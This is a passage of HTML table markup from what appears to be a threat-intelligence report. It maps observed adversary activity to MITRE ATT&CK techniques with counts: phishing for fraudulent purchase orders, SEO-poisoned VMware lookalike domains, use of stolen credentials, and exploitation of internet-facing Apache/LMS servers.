class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used malicious emails and social engineering to compromise user accounts and<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">facilitate</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>fraudulent purchase orders.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1724030027" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{37}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">5</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="6" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="486660714" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{192}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1967400971" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{45}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1189: Drive-by compromise</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1189191223" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{52}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary registered several domains that masquerade as being related to VMware, and manipulated the SEO to show them at the top when searching for keywords such as VMware</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="361722668" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{59}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">3</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="7" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="815557930" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{196}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="180454131" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{67}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1078: Valid Accounts</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1736886779" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{74}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary successfully gained access to the environment by using compromised user credentials&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1684488983" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{81}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">4</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="8" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1650225967" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{200}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1566230868" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{89}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1190: Exploit public-facing applications</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="878908864" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{96}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Two internet facing Linux servers running Apache and an LMS application were targeted.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="603641844" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{103}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span 